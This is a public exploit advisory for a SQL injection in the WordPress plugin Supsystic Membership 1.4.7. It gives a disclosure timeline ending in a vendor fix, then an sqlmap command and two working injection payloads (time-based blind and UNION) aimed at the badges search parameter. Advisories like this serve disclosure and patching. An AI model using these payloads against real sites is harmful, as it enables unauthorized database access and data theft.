Exploit for WordPress Supsystic Membership 1.4.7 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:161307
# Exploit Title: WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection  
# Date: 09/08/2020  
# Exploit Author: Erik David Martin  
# Vendor Homepage: https://supsystic.com/  
# Software Link: https://downloads.wordpress.org/plugin/membership-by-supsystic.1.4.7.zip  
# Version: 1.4.7  
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2  
  
  
  
# 25/07 2020: Vendor notified  
# 27/07 2020: Vendor requested detailed information  
# 27/07 2020: Information provided  
# 07/08 2020: Nudged vendor. No reply  
# 22/08 2020: Nudged vendor. No reply  
# 04/10 2020: Nudged vendor. No reply  
# 29/11 2020: WordPress Plugin Security team contacted  
# 22/12 2020: Vulnerability fixed  
  
  
# 1. Description  
  
The GET parameters "search" and "sidx" does not sanitize user input when searching for badges.  
  
  
# 2. Proof of Concept (PoC)  
  
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt  
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index  
  
sqlmap -r request.txt --dbms=mysql -p search  
  
Parameter: search (GET)  
Type: time-based blind  
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc  
  
Type: UNION query  
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc